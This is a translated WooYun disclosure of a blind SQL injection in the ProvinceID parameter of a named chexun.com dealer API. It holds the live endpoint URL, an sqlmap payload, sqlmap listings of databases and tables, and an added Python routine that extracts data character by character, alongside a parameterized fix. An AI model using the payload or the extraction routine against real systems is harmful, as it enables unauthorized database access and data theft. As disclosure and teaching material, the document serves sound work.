
Vulnerability summary

Defect ID: wooyun-2015-0151634

Title: SQL injection on a 车讯网 site

Vendor: 车讯网

Author: Hancock

Submitted: 2015-11-04 12:37

Fix time: 2015-11-09 12:38

Disclosed: 2015-11-09 12:38

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-04: details sent to the vendor, awaiting vendor response
2015-11-09: vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

A 车讯网 site has a SQL injection vulnerability.

Detailed description:

The ProvinceID GET parameter of the following endpoint is injectable; the value is spliced into the query's WHERE clause, and the injection is boolean-based blind (no error text or query output is reflected, only a true/false difference in the response):

http://dealer.chexun.com/API/GetDealersByBrandIdOrCompanyId.ashx?ProvinceID=3


Payload (sqlmap detection output):

---
Parameter: ProvinceID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ProvinceID=3 AND 6524=6524
---


21 databases are reachable from the injected query. The system databases master, model, msdb and tempdb, together with the replication database distribution, identify the backend as Microsoft SQL Server, and the list reaches well beyond the dealer site into user-center (DBUCenter), SMS, feedback, voting and group-buy data:

available databases [21]:
[*] CheBaiKe
[*] DBAiKaZhuaQu
[*] DBCarSite
[*] DBCharacterLibrary
[*] DBComment
[*] DBDealersShop
[*] DBDingYue
[*] DBDoublue11
[*] DBFeedback
[*] DBSMS
[*] DBTuangou
[*] DBUCenter
[*] DBVoting
[*] DBWapNews
[*] distribution
[*] master
[*] model
[*] msdb
[*] ProjectManagement
[*] tempdb
[*] ZhaoCheGameDB

Proof of vulnerability (table enumeration of DBDealersShop, sqlmap output):

Database: DBDealersShop
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| dbo.Shop_Access_Log | 3456993 |
| dbo.NewCarPublish_Tab | 2615828 |
| dbo.Dealer_HuoYue | 2137347 |
| dbo.Dealers_Shop_Notice_Cheap | 403031 |
| dbo.Dealers_Brand_Series_Tab | 283743 |
| dbo.Dealers_XunJia_Orders_Tab | 160857 |
| dbo.Dealers_Shop_Notice_Tab | 151409 |
| dbo.View_XianSuo | 151316 |
| dbo.LoginLog | 83951 |
| dbo.Dealers_Tab_ZhuaQu | 75521 |
| dbo.Dealers_TJ_Log | 66837 |
| dbo.Dealers_Shop_Notice_Pic | 44107 |
| dbo.Dealers_Shop_Photos_Tab | 35897 |
| dbo.Dealers_Tab | 28020 |
| dbo.ModelPrice_Tab | 28013 |
| dbo.Dealer_Record_OP | 24149 |
| dbo.DealersMessages_Tab | 19588 |
| dbo.Dealers_Saler_Team_Tab | 19174 |
| dbo.bbbb | 16086 |
| dbo.Dealer_ZiZhangHu | 12594 |
| dbo.dealer_new | 12136 |
| dbo.CAR_MODEL | 11620 |
| dbo.System_Notice_Send_Tab | 11545 |
| dbo.Dealers_Car_Orders_tab | 11108 |
| dbo.Buy_ShenQing | 8511 |
| dbo.Buy_ShenQing_Log_Model | 7208 |
| dbo.Buy_Order | 7100 |
| dbo.Buy_Order_YanZhengMa | 4233 |
| dbo.CAR_years | 2916 |
| dbo.COMMON_REGIONAL | 2873 |
| dbo.aa | 2846 |
| dbo.DealersPhoneLog_Tab | 2189 |
| dbo.Dealer_XunJia_DealerCount_Log | 1980 |
| dbo.Buy_ShengQing_Log | 1943 |
| dbo.Dealer_400_Recored | 1544 |
| dbo.CAR_series | 1498 |
| dbo.DealersTheme_Tab | 1492 |
| dbo.Buy_BaoZhengJin_LiuShui | 971 |
| dbo.Dealers_Register_Tab | 931 |
| dbo.Dealers_XunJia_Orders_Tab_20150320bak | 903 |
| dbo.Dealer_ZiZhangHu_Log | 824 |
| dbo.Buy_HuoDong_CheYuan | 492 |
| dbo.Dealers_Fast_Reply_Tab | 370 |
| dbo.City_Tab | 364 |
| dbo.Buy_ZiZhi | 305 |
| dbo.Dealers_Tab_ZhuaQu_City | 305 |
| dbo.Dealers_Tab_ZhuaQu_Brand | 284 |
| dbo.BuChong | 280 |
| dbo.PangDa | 200 |
| dbo.RiChanDealers | 198 |
| dbo.Buy_Dealer_ZhangHu | 191 |
| dbo.Dealers_AddCarLog | 156 |
| dbo.CAR_company | 146 |
| dbo.Dealers_Contract | 146 |
| dbo.Order_Return | 142 |
| dbo.SaleTemp | 124 |
| dbo.CAR_Brand | 122 |
| dbo.XianSuo_Record | 119 |
| dbo.Buy_BaoZhengJin_Log | 115 |
| dbo.Buy_ShenQing_KuCun | 109 |
| dbo.Dealer_TelKTJB_Recored | 93 |
| dbo.Buy_HuoDong_Log | 67 |
| dbo.LevelLimits_Tab | 59 |
| dbo.Buy_HuoDong | 50 |
| dbo.Dealers_Agent | 48 |
| dbo.Province_Tab | 34 |
| dbo.News_Tab | 29 |
| dbo.Dealers_Advice | 26 |
| dbo.Buy_MaintainceService | 20 |
| dbo.System_Notice_Tab | 14 |
| dbo.Buy_DingJin_Item | 11 |
| dbo.Mall_Lishi | 10 |
| dbo.Dealer_Mall_Respone | 9 |
| dbo.Region_Tab | 9 |
| dbo.Dealer_Shop_ShenQing | 8 |
| dbo.ZhiHuanGouChe | 8 |
| dbo.Buy_ZhangHu | 1 |
| dbo.Dealers_limits_Tab | 1 |
+-------------------------------------------+---------+

Remediation:

:(
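The remediation section is empty, so the following is an added example (not code from the report or from chexun.com) that demonstrates both the boolean-based blind technique behind the `ProvinceID=3 AND 6524=6524` probe shown above and the fix. The production endpoint is an ASP.NET .ashx handler in front of Microsoft SQL Server; here an in-memory SQLite database stands in for it, the `dealers` table with its columns and rows is constructed for the example, and the two handler functions are hypothetical Python equivalents of the server-side code (one splicing the parameter into the query, one binding it). Pulling a table name out of `sqlite_master` plays the role that enumerating `sys.databases` played in the report; on SQL Server the per-character probe would be `ASCII(SUBSTRING((expr), i, 1)) > mid` instead of the SQLite `unicode(substr(...))` form used below.

```python
"""Boolean-based blind SQL injection against a ProvinceID-style parameter:
detection with the TRUE/FALSE probe pair, character-by-character extraction,
and a parameterized handler that closes the hole.

Added example. SQLite stands in for the Microsoft SQL Server behind the real
.ashx endpoint; the table, columns and rows are constructed for this demo.
"""
import sqlite3
from typing import Callable, List

Handler = Callable[[sqlite3.Connection, str], List[str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a dealer table keyed by province."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE dealers (id INTEGER PRIMARY KEY, name TEXT, province_id INTEGER);
        INSERT INTO dealers VALUES
            (1, 'Beijing Motors', 3),
            (2, 'Tianjin Auto', 3),
            (3, 'Shanghai Cars', 9);
        """
    )
    return conn


def vulnerable_handler(conn: sqlite3.Connection, province_id: str) -> List[str]:
    """Hypothetical equivalent of the flawed handler: the raw GET value is
    spliced into the WHERE clause, so 'ProvinceID=3 AND 6524=6524' becomes SQL."""
    sql = "SELECT name FROM dealers WHERE province_id = " + province_id
    return [row[0] for row in conn.execute(sql)]


def fixed_handler(conn: sqlite3.Connection, province_id: str) -> List[str]:
    """Hardened version: reject anything that is not a plain integer, then bind
    the value as a parameter so the database never parses it as SQL."""
    if not province_id.isdigit():
        raise ValueError("ProvinceID must be a non-negative integer")
    sql = "SELECT name FROM dealers WHERE province_id = ?"
    return [row[0] for row in conn.execute(sql, (int(province_id),))]


def is_injectable(handler: Handler, conn: sqlite3.Connection, base: str = "3") -> bool:
    """The check sqlmap reported as 'AND boolean-based blind': appending a TRUE
    condition must leave the response unchanged, and a FALSE one must change it."""
    try:
        baseline = handler(conn, base)
        true_resp = handler(conn, base + " AND 6524=6524")
        false_resp = handler(conn, base + " AND 6524=6525")
    except (ValueError, sqlite3.Error):
        return False
    return baseline == true_resp and true_resp != false_resp


def blind_extract(handler: Handler, conn: sqlite3.Connection, expr: str,
                  max_len: int = 64, base: str = "3") -> str:
    """Recover the string value of the SQL subquery `expr` using only the
    TRUE/FALSE oracle: binary search on each character's code point, about
    seven requests per character."""
    truthy = handler(conn, base)
    result = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({expr}), {i}, 1)) > {mid}"
            if handler(conn, f"{base} AND {cond}") == truthy:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end gives '', unicode('') is NULL, so FALSE
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", is_injectable(vulnerable_handler, db))
    print("fixed handler injectable:", is_injectable(fixed_handler, db))
    # Analogue of sqlmap's schema enumeration: read a table name out of the catalog.
    print("table name via blind extraction:",
          blind_extract(vulnerable_handler, db,
                        "SELECT name FROM sqlite_master WHERE type='table'"))
```

The point of `fixed_handler` is that the value reaches the database as a bound integer, not as query text: the probe `3 AND 6524=6524` fails type validation before any SQL is built, and even a value that passed validation could not alter the statement's structure. In the real ASP.NET handler the same shape is `int.TryParse` on the query-string value followed by a `SqlCommand` with a `SqlParameter`, never string concatenation.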

Copyright notice: please credit Hancock@乌云 when reposting


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored the report)

Ignored at: 2015-11-09 12:38

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None